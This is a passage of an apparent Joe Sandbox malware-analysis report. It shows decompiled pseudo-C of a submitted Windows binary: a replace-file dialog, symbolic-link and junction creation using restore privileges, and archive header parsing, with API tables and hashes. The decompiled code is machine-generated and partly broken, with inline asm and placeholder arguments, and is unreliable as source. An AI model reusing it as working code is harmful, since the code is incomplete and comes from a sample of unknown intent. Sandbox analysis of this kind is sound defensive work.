				_t148 = _a6748;
				_t163 = _a6744;
				_t160 = _a6740;
				if(E00E6130B(__edx, _t160, _t163, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t164 = _t163 - 0x110;
					if(_t164 == 0) {
						SetFocus(GetDlgItem(_t160, 0x6c));
						E00E70131( &_a2640, _a6752, 0x800);
						E00E6BF5F( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t160, 0x65,  &_a2616);
						 *0xec2080( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t160, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t167 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00E63F8F( &_a900, 0x200, L"%s %s %s", E00E6E0AC(_t152, 0x99));
							_t177 = _t175 + 0x18;
							SetDlgItemTextW(_t160, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t151 = 0x200;
							} else {
								asm("adc eax, ebp");
								E00E7A8CC(0 + _a344, _a340,  &_a212, 0x32);
								_push(E00E6E0AC(0 + _a344, 0x98));
								_t151 = 0x200;
								E00E63F8F( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t160, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t160, 0x67, 0x170, _a1928, 0);
							_t153 =  *0xea8464; // 0x0
							E00E70EAD(_t153, _t157,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t167,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00E63F8F( &_a896, _t151, L"%s %s %s", E00E6E0AC(_t153, 0x99));
							_t175 = _t177 + 0x18;
							SetDlgItemTextW(_t160, 0x6b,  &_a896);
							_t154 =  *0xebdc8c;
							_t158 =  *0xebdc88;
							if((_a304 & 0x00000010) == 0 || (_t158 | _t154) != 0) {
								E00E7A8CC(_t158, _t154,  &_a212, 0x32);
								_push(E00E6E0AC(_t154, 0x98));
								E00E63F8F( &_a884, _t151, L"%s %s",  &_a192);
								_t175 = _t175 + 0x14;
								SetDlgItemTextW(_t160, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t164 != 1) {
						goto L27;
					}
					_t170 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t170;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t170);
						L13:
						_t137 = SendDlgItemMessageW(_t160, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xec20d8(_t137);
						}
						EndDialog(_t160, _t170);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t170 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t170 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}

0x00e7bb70
0x00e7bb70
0x00e7bb75
0x00e7bb7b
0x00e7bb84
0x00e7bb8e
0x00e7bbad
0x00e7bbb7
0x00e7bbbd
0x00e7bc37
0x00e7bc52
0x00e7bc61
0x00e7bc71
0x00e7bc92
0x00e7bca8
0x00e7bcc4
0x00e7bcc9
0x00e7bcdc
0x00e7bcec
0x00e7bcf2
0x00e7bcf8
0x00e7bcf9
0x00e7bcfe
0x00e7bd01
0x00e7bd08
0x00e7bd24
0x00e7bd2e
0x00e7bd36
0x00e7bd54
0x00e7bd59
0x00e7bd67
0x00e7bd6e
0x00e7bd7c
0x00e7bde2
0x00e7bd7e
0x00e7bd98
0x00e7bd9c
0x00e7bdab
0x00e7bdb3
0x00e7bdc7
0x00e7bdcc
0x00e7bdda
0x00e7bdda
0x00e7bdf7
0x00e7bdfd
0x00e7be08
0x00e7be17
0x00e7be27
0x00e7be41
0x00e7be59
0x00e7be63
0x00e7be6b
0x00e7be85
0x00e7be8a
0x00e7be98
0x00e7bea6
0x00e7beac
0x00e7beb2
0x00e7bec6
0x00e7bed5
0x00e7beec
0x00e7bef1
0x00e7beff
0x00e7beff
0x00e7beb2
0x00e7bf05
0x00e7bf05
0x00e7bf07
0x00e7bf11
0x00e7bf11
0x00e7bbc2
0x00000000
0x00000000
0x00e7bbcd
0x00e7bbce
0x00e7bbd0
0x00e7bbf4
0x00e7bbf4
0x00e7bbf6
0x00e7bbf6
0x00e7bbf7
0x00e7bc01
0x00e7bc09
0x00e7bc0c
0x00e7bc0c
0x00e7bc14
0x00000000
0x00e7bc14
0x00e7bbd2
0x00e7bbd5
0x00e7bc29
0x00000000
0x00e7bc29
0x00e7bbd7
0x00e7bbda
0x00e7bc26
0x00000000
0x00e7bc26
0x00e7bbdc
0x00e7bbdf
0x00e7bc20
0x00000000
0x00e7bc20
0x00e7bbe1
0x00e7bbe4
0x00000000
0x00000000
0x00e7bbe6
0x00e7bbe9
0x00e7bc1c
0x00000000
0x00e7bc1c
0x00e7bbee
0x00000000
0x00000000
0x00000000
0x00e7bbee
0x00e7bbaf
0x00e7bbb1
0x00000000

APIs

Part of subcall function 00E6130B: GetDlgItem.USER32(00000000,00003021), ref: 00E6134F
Part of subcall function 00E6130B: SetWindowTextW.USER32(00000000,00E935B4), ref: 00E61365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E7BC01
EndDialog.USER32(?,00000006), ref: 00E7BC14
GetDlgItem.USER32(?,0000006C), ref: 00E7BC30
SetFocus.USER32(00000000), ref: 00E7BC37
SetDlgItemTextW.USER32(?,00000065,?), ref: 00E7BC71
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E7BCA8
FindFirstFileW.KERNEL32(?,?), ref: 00E7BCBE
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E7BCDC
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E7BCEC
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E7BD08
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E7BD24
_swprintf.LIBCMT ref: 00E7BD54

Part of subcall function 00E63F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E63FA2

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00E7BD67
FindClose.KERNEL32(00000000), ref: 00E7BD6E
_swprintf.LIBCMT ref: 00E7BDC7
SetDlgItemTextW.USER32(?,00000068,?), ref: 00E7BDDA
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E7BDF7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00E7BE17
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E7BE27
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E7BE41
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E7BE59
_swprintf.LIBCMT ref: 00E7BE85
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00E7BE98
_swprintf.LIBCMT ref: 00E7BEEC
SetDlgItemTextW.USER32(?,00000069,?), ref: 00E7BEFF

Part of subcall function 00E7A8CC: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E7A8F2
Part of subcall function 00E7A8CC: GetNumberFormatW.KERNEL32 ref: 00E7A941

Strings

REPLACEFILEDLG, xrefs: 00E7BB97
%s %s, xrefs: 00E7BDB9, 00E7BEDE
%s %s %s, xrefs: 00E7BD42, 00E7BE77

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: cc0f2896b3bd926515b53f2b9212a51ad7e005e091ca86b3e9e14af8daa10228
Instruction ID: 99a7e6710b005e427447bb53877583685a53341f1f8eff9ff577ba25e91f1414
Opcode Fuzzy Hash: cc0f2896b3bd926515b53f2b9212a51ad7e005e091ca86b3e9e14af8daa10228
Instruction Fuzzy Hash: 9E91B7B2248348BFD2219BB1DC49FFB77ECEB49704F04582AF749E6091DB7196098762

Uniqueness

Uniqueness Score: -1.00%

Function 00E671E6 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 326
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E671E6(void* __edx) {
				void* __esi;
				signed int _t109;
				void* _t111;
				void* _t112;
				intOrPtr _t115;
				intOrPtr _t121;
				signed int _t139;
				long _t158;
				void* _t184;
				void* _t188;
				void* _t192;
				void* _t197;
				short _t198;
				void* _t202;
				intOrPtr _t203;
				void* _t206;
				void* _t207;
				void* _t229;
				void* _t230;
				void* _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				WCHAR* _t237;
				intOrPtr _t240;
				short _t241;
				void* _t242;
				intOrPtr _t246;
				short _t248;
				void* _t249;
				void* _t251;
				void* _t252;

				_t232 = __edx;
				E00E7E554(E00E9209F, _t249);
				E00E7E630();
				if( *0xea0eb3 == 0) {
					E00E67CC4(L"SeRestorePrivilege");
					E00E67CC4(L"SeCreateSymbolicLinkPrivilege");
					 *0xea0eb3 = 1;
				}
				_t205 = _t249 - 0x2c;
				E00E61380(_t249 - 0x2c, 0x1418);
				_t240 =  *((intOrPtr*)(_t249 + 0x10));
				_t202 = 0;
				 *((intOrPtr*)(_t249 - 4)) = 0;
				E00E70131(_t249 - 0x107c, _t240 + 0x1104, 0x800);
				 *((intOrPtr*)(_t249 - 0x18)) = E00E83883(_t249 - 0x107c);
				_t236 = _t249 - 0x107c;
				_t109 = E00E85AF8(_t249 - 0x107c, L"\\??\\", 4);
				_t252 = _t251 + 0x10;
				asm("sbb al, al");
				_t111 =  ~_t109 + 1;
				 *(_t249 - 0x10) = _t111;
				if(_t111 == 0) {
					L5:
					_t112 = _t249 - 0x207c;
					L6:
					E00E85AD6(_t112, _t236);
					_t115 = E00E83883(_t249 - 0x207c);
					_t237 =  *(_t249 + 0xc);
					 *((intOrPtr*)(_t249 - 0x14)) = _t115;
					_t116 =  *((intOrPtr*)(_t249 + 8));
					if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)) + 0x6197)) != _t202) {
						L11:
						E00E6A1EF(_t205, _t249, _t237, 1,  *(_t116 + 0x6147) & 0x000000ff);
						if(E00E6A373(_t237) != 0) {
							_t188 = E00E6A3D5(E00E6A387(_t237));
							_push(_t237);
							if(_t188 == 0) {
								E00E6A320();
							} else {
								E00E6A2CD();
							}
						}
						if( *((intOrPtr*)(_t240 + 0x10f1)) != _t202 ||  *((intOrPtr*)(_t240 + 0x2104)) != _t202) {
							__eflags = CreateDirectoryW(_t237, _t202);
							if(__eflags != 0) {
								goto L20;
							}
							E00E66D72(__eflags, 0x14, _t202, _t237);
							_t229 = 0xea0f50;
							goto L29;
						} else {
							_t184 = CreateFileW(_t237, 0x40000000, _t202, _t202, 1, 0x80, _t202);
							if(_t184 != 0xffffffff) {
								CloseHandle(_t184);
								L20:
								_t121 =  *((intOrPtr*)(_t240 + 0x1100));
								__eflags = _t121 - 3;
								if(_t121 != 3) {
									__eflags = _t121 - 2;
									if(_t121 == 2) {
										L26:
										_t206 =  *(_t249 - 0x2c);
										_t233 =  *((intOrPtr*)(_t249 - 0x18));
										 *_t206 = 0xa000000c;
										_t241 = _t233 + _t233;
										 *((short*)(_t206 + 0xa)) = _t241;
										 *((short*)(_t206 + 4)) = 0x10 + ( *((intOrPtr*)(_t249 - 0x14)) + _t233) * 2;
										 *((intOrPtr*)(_t206 + 6)) = 0;
										E00E85AD6(_t206 + 0x14, _t249 - 0x107c);
										_t242 =  *(_t249 - 0x2c);
										 *((short*)(_t242 + 0xc)) = _t241 + 2;
										 *((short*)(_t242 + 0xe)) =  *((intOrPtr*)(_t249 - 0x14)) +  *((intOrPtr*)(_t249 - 0x14));
										E00E85AD6(_t242 + ( *((intOrPtr*)(_t249 - 0x18)) + 0xb) * 2, _t249 - 0x207c);
										_t139 =  *(_t249 - 0x10) & 0x000000ff ^ 0x00000001;
										__eflags = _t139;
										 *(_t242 + 0x10) = _t139;
										L27:
										_t207 = CreateFileW(_t237, 0xc0000000, _t202, _t202, 3, 0x2200000, _t202);
										 *(_t249 - 0x10) = _t207;
										__eflags = _t207 - 0xffffffff;
										if(_t207 != 0xffffffff) {
											__eflags = DeviceIoControl(_t207, 0x900a4, _t242, ( *(_t242 + 4) & 0x0000ffff) + 8, _t202, _t202, _t249 - 0x30, _t202);
											if(__eflags != 0) {
												E00E697B6(_t249 - 0x30a4);
												 *((char*)(_t249 - 4)) = 1;
												E00E67CA3(_t249 - 0x30a4,  *(_t249 - 0x10));
												_t203 =  *((intOrPtr*)(_t249 + 8));
												_t243 =  *((intOrPtr*)(_t249 + 0x10));
												asm("sbb ecx, ecx");
												asm("sbb ecx, ecx");
												asm("sbb ecx, ecx");
												E00E69F02(_t249 - 0x30a4,  *((intOrPtr*)(_t249 + 0x10)),  ~( *(_t203 + 0x72d0)) &  *((intOrPtr*)(_t249 + 0x10)) + 0x00001040,  ~( *(_t203 + 0x72d4)) & _t243 + 0x00001048,  ~( *(_t203 + 0x72d8)) & _t243 + 0x00001050);
												E00E69870(_t249 - 0x30a4);
												__eflags =  *((char*)(_t203 + 0x61a8));
												if( *((char*)(_t203 + 0x61a8)) == 0) {
													E00E6A637(_t237,  *((intOrPtr*)(_t243 + 0x24)));
												}
												_t202 = 1;
												E00E697F0(_t249 - 0x30a4, _t243);
												L41:
												E00E615C2(_t249 - 0x2c);
												 *[fs:0x0] =  *((intOrPtr*)(_t249 - 0xc));
												return _t202;
											}
											CloseHandle( *(_t249 - 0x10));
											E00E66D72(__eflags, 0x15, _t202, _t237);
											_t158 = GetLastError();
											__eflags = _t158 - 5;
											if(_t158 == 5) {
												L33:
												__eflags = E00E702FB();
												if(__eflags == 0) {
													E00E6158D(_t249 - 0x7c, 0x18);
													E00E71107(_t249 - 0x7c);
												}
												L35:
												E00E67002(__eflags);
												E00E66FBA(0xea0f50, 9);
												_t246 =  *((intOrPtr*)(_t249 + 0x10));
												_push(_t237);
												__eflags =  *((intOrPtr*)(_t246 + 0x10f1)) - _t202;
												if( *((intOrPtr*)(_t246 + 0x10f1)) == _t202) {
													DeleteFileW();
												} else {
													RemoveDirectoryW();
												}
												goto L41;
											}
											__eflags = _t158 - 0x522;
											if(__eflags != 0) {
												goto L35;
											}
											goto L33;
										}
										E00E66E55(_t237);
										_t229 = 0xea0f50;
										L29:
										E00E66FBA(_t229, 9);
										goto L41;
									}
									__eflags = _t121 - 1;
									if(_t121 != 1) {
										goto L41;
									}
									goto L26;
								}
								_t230 =  *(_t249 - 0x2c);
								_t234 =  *((intOrPtr*)(_t249 - 0x18));
								 *_t230 = 0xa0000003;
								_t248 = _t234 + _t234;
								 *((short*)(_t230 + 0xa)) = _t248;
								 *((short*)(_t230 + 4)) = 0xc + ( *((intOrPtr*)(_t249 - 0x14)) + _t234) * 2;
								 *((intOrPtr*)(_t230 + 6)) = 0;
								E00E85AD6(_t230 + 0x10, _t249 - 0x107c);
								_t242 =  *(_t249 - 0x2c);
								 *((short*)(_t242 + 0xc)) = _t248 + 2;
								 *((short*)(_t242 + 0xe)) =  *((intOrPtr*)(_t249 - 0x14)) +  *((intOrPtr*)(_t249 - 0x14));
								E00E85AD6(_t242 + ( *((intOrPtr*)(_t249 - 0x18)) + 9) * 2, _t249 - 0x207c);
								goto L27;
							}
							E00E66E55(_t237);
							goto L41;
						}
					}
					if( *(_t249 - 0x10) != _t202) {
						goto L41;
					}
					_t192 = E00E6BA22(_t240 + 0x1104);
					_t262 = _t192;
					if(_t192 != 0) {
						goto L41;
					}
					_push(_t240 + 0x1104);
					_push(_t237);
					_push(_t240 + 0x28);
					_push( *((intOrPtr*)(_t249 + 8)));
					if(E00E67A81(_t232, _t262) == 0) {
						goto L41;
					}
					_t116 =  *((intOrPtr*)(_t249 + 8));
					goto L11;
				}
				_t236 = _t249 - 0x1074;
				_t197 = E00E85AF8(_t249 - 0x1074, L"UNC\\", 4);
				_t252 = _t252 + 0xc;
				if(_t197 != 0) {
					goto L5;
				} else {
					_t198 = 0x5c;
					 *((short*)(_t249 - 0x207c)) = _t198;
					_t236 = _t249 - 0x106e;
					_t112 = _t249 - 0x207a;
					goto L6;
				}
			}

0x00e671e6
0x00e671eb
0x00e671f5
0x00e67201
0x00e67208
0x00e67212
0x00e67217
0x00e67217
0x00e67226
0x00e67229
0x00e6722e
0x00e67231
0x00e67238
0x00e67249
0x00e6725c
0x00e6725f
0x00e6726d
0x00e67272
0x00e67277
0x00e67279
0x00e6727b
0x00e67280
0x00e672b6
0x00e672b6
0x00e672bc
0x00e672be
0x00e672ca
0x00e672cf
0x00e672d5
0x00e672d8
0x00e672e1
0x00e6731f
0x00e6732a
0x00e67337
0x00e67340
0x00e67345
0x00e67348
0x00e67351
0x00e6734a
0x00e6734a
0x00e6734a
0x00e67348
0x00e6735c
0x00e67420
0x00e67422
0x00000000
0x00000000
0x00e6742c
0x00e67431
0x00000000
0x00e6736e
0x00e6737e
0x00e67387
0x00e6739a
0x00e673a0
0x00e673a0
0x00e673a6
0x00e673a9
0x00e6743b
0x00e6743e
0x00e67449
0x00e67449
0x00e6744c
0x00e67454
0x00e6745a
0x00e6745d
0x00e67468
0x00e6746e
0x00e6747c
0x00e67484
0x00e67487
0x00e67490
0x00e674a5
0x00e674b3
0x00e674b3
0x00e674b6
0x00e674b9
0x00e674cf
0x00e674d1
0x00e674d4
0x00e674d7
0x00e67510
0x00e67512
0x00e67590
0x00e6759e
0x00e675a2
0x00e675a7
0x00e675aa
0x00e675bb
0x00e675ce
0x00e675e1
0x00e675ec
0x00e675f7
0x00e675fc
0x00e67603
0x00e67609
0x00e67609
0x00e67614
0x00e67616
0x00e6761b
0x00e6761e
0x00e6762b
0x00e67635
0x00e67635
0x00e67517
0x00e67521
0x00e67526
0x00e6752c
0x00e6752f
0x00e67538
0x00e6753d
0x00e6753f
0x00e67546
0x00e6754e
0x00e6754e
0x00e67553
0x00e6755a
0x00e67563
0x00e67568
0x00e6756b
0x00e6756c
0x00e67572
0x00e6757f
0x00e67574
0x00e67574
0x00e67574
0x00000000
0x00e67572
0x00e67531
0x00e67536
0x00000000
0x00000000
0x00000000
0x00e67536
0x00e674e1
0x00e674e6
0x00e674e8
0x00e674ea
0x00000000
0x00e674ea
0x00e67440
0x00e67443
0x00000000
0x00000000
0x00000000
0x00e67443
0x00e673af
0x00e673b2
0x00e673ba
0x00e673c0
0x00e673c3
0x00e673ce
0x00e673d4
0x00e673e2
0x00e673ea
0x00e673ed
0x00e673f6
0x00e6740b
0x00000000
0x00e67410
0x00e6738f
0x00000000
0x00e6738f
0x00e6735c
0x00e672e6
0x00000000
0x00000000
0x00e672f3
0x00e672f8
0x00e672fa
0x00000000
0x00000000
0x00e67306
0x00e67307
0x00e6730b
0x00e6730c
0x00e67316
0x00000000
0x00000000
0x00e6731c
0x00000000
0x00e6731c
0x00e67284
0x00e67292
0x00e67297
0x00e6729c
0x00000000
0x00e6729e
0x00e672a0
0x00e672a1
0x00e672a8
0x00e672ae
0x00000000
0x00e672ae

APIs

__EH_prolog.LIBCMT ref: 00E671EB

Part of subcall function 00E67CC4: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E67CD3
Part of subcall function 00E67CC4: GetLastError.KERNEL32 ref: 00E67D19
Part of subcall function 00E67CC4: CloseHandle.KERNEL32(?), ref: 00E67D28

Part of subcall function 00E6A320: DeleteFileW.KERNELBASE(?,?,?,00E699EC,?,?,00E69825,?,?,?,?,00E91F81,000000FF), ref: 00E6A331
Part of subcall function 00E6A320: DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00E699EC,?,?,00E69825,?,?,?,?,00E91F81,000000FF), ref: 00E6A35F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E6737E
CloseHandle.KERNEL32(00000000), ref: 00E6739A
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E674C9

Strings

\??\, xrefs: 00E67267
SeRestorePrivilege, xrefs: 00E67203
SeCreateSymbolicLinkPrivilege, xrefs: 00E6720D
UNC\, xrefs: 00E6728C

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: File$CloseCreateDeleteHandle$CurrentErrorH_prologLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2517273693-3508440684
Opcode ID: b6635e421902c38bc06e76476e04505faa7640bdb103d4bdb0219753f03f21c4
Instruction ID: 927f767ccf641fc13c77fe4dde9a2895a28c14fbc77a1707fa33ea47f70f3ccb
Opcode Fuzzy Hash: b6635e421902c38bc06e76476e04505faa7640bdb103d4bdb0219753f03f21c4
Instruction Fuzzy Hash: A3C1F571944204AEDF20EF74EC85EEEB7B8AF04348F04556AF59AF7242D770AA44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E63206 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00E63206(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t379;
				void* _t381;
				void* _t382;
				void* _t393;
				intOrPtr* _t395;
				intOrPtr* _t397;
				signed int _t410;
				signed int _t420;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				intOrPtr _t501;
				signed int _t502;
				signed char _t503;
				unsigned int _t504;
				void* _t511;
				void* _t519;
				signed int _t522;
				void* _t523;
				signed int _t533;
				unsigned int _t536;
				void* _t541;
				intOrPtr _t546;
				void* _t547;
				void* _t548;
				void* _t549;
				intOrPtr _t559;

				_t397 = __ecx;
				_t549 = _t548 - 0x68;
				E00E7E554(E00E91FDB, _t547);
				E00E7E630();
				_t395 = _t397;
				E00E6C769(_t547 + 0x30, _t395);
				 *(_t547 + 0x60) = 0;
				 *((intOrPtr*)(_t547 - 4)) = 0;
				if( *((intOrPtr*)(_t395 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t547 + 0x6a)) = 0;
					L16:
					_push(7);
					if(E00E6C974() >= 7) {
						 *(_t395 + 0x21f4) = 0;
						_t511 = _t395 + 0x21e4;
						 *_t511 = E00E6C7E4(_t547 + 0x30);
						_t533 = E00E6C950(_t547 + 0x30, 4);
						_t242 = E00E6C8E4(_t500);
						__eflags = _t242 | _t500;
						if((_t242 | _t500) == 0) {
							L85:
							E00E61FD3(_t395);
							L86:
							E00E615C2(_t547 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t547 - 0xc));
							return  *(_t547 + 0x60);
						}
						__eflags = _t533;
						if(_t533 == 0) {
							goto L85;
						}
						_t42 = _t533 - 3; // -3
						_t536 = _t533 + 4 + _t242;
						_t410 = _t42 + _t242;
						__eflags = _t410;
						 *(_t547 + 0x64) = _t536;
						if(_t410 < 0) {
							goto L85;
						}
						__eflags = _t536 - 7;
						if(_t536 < 7) {
							goto L85;
						}
						_push(_t410);
						E00E6C974();
						__eflags =  *(_t547 + 0x48) - _t536;
						if( *(_t547 + 0x48) < _t536) {
							goto L17;
						}
						_t248 = E00E6C8C4(_t547 + 0x30);
						 *(_t395 + 0x21e8) = E00E6C8E4(_t500);
						_t250 = E00E6C8E4(_t500);
						 *(_t395 + 0x21ec) = _t250;
						__eflags =  *_t511 - _t248;
						 *(_t395 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t395 + 0x21f0) =  *(_t547 + 0x64);
						_t254 =  *(_t395 + 0x21e8);
						 *(_t395 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t511 != _t248;
						 *(_t547 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t395 + 0x21ec) & 0x00000001;
							 *(_t547 + 0x58) = 0;
							 *(_t547 + 0x54) = 0;
							if(( *(_t395 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t395 + 0x21ec) & 0x00000002;
								_t538 = _t256;
								 *(_t547 + 0x64) = _t256;
								 *(_t547 + 0x5c) = _t256;
								if(( *(_t395 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E00E6C8E4(_t500);
									_t538 = _t362;
									 *(_t547 + 0x64) = _t362;
									 *(_t547 + 0x5c) = _t500;
								}
								_t257 = E00E61944(_t395,  *(_t395 + 0x21f0));
								_t501 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t395 + 0x6ca8)) = E00E63DF5( *((intOrPtr*)(_t395 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t395 + 0x6ca4)), _t538,  *(_t547 + 0x5c), _t501, _t501);
								 *((intOrPtr*)(_t395 + 0x6cac)) = _t501;
								_t502 =  *(_t395 + 0x21e8);
								__eflags = _t502 - 1;
								if(__eflags == 0) {
									E00E6AEBC(_t395 + 0x2208);
									_t420 = 5;
									memcpy(_t395 + 0x2208, _t511, _t420 << 2);
									_t503 = E00E6C8E4(_t502);
									 *(_t395 + 0x6cb5) = _t503 & 1;
									 *(_t395 + 0x6cb4) = _t503 >> 0x00000002 & 1;
									 *(_t395 + 0x6cb7) = _t503 >> 0x00000004 & 1;
									_t432 = 1;
									 *((char*)(_t395 + 0x6cba)) = 1;
									 *(_t395 + 0x6cbb) = _t503 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t395 + 0x6cb8)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = E00E6C8E4(_t503);
										_t270 = 0;
										_t432 = 1;
									}
									__eflags =  *(_t395 + 0x6cb5);
									if( *(_t395 + 0x6cb5) == 0) {
										L81:
										_t432 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t395 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t395 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t395 + 0x6cb9)) = _t432;
											_t433 =  *(_t547 + 0x58);
											__eflags = _t433 |  *(_t547 + 0x54);
											if((_t433 |  *(_t547 + 0x54)) != 0) {
												E00E620E7(_t395, _t547 + 0x30, _t433, _t395 + 0x2208);
											}
											L84:
											 *(_t547 + 0x60) =  *(_t547 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t502 - 3;
								if(_t502 <= 3) {
									__eflags = _t502 - 2;
									_t120 = (0 | _t502 != 0x00000002) - 1; // -1
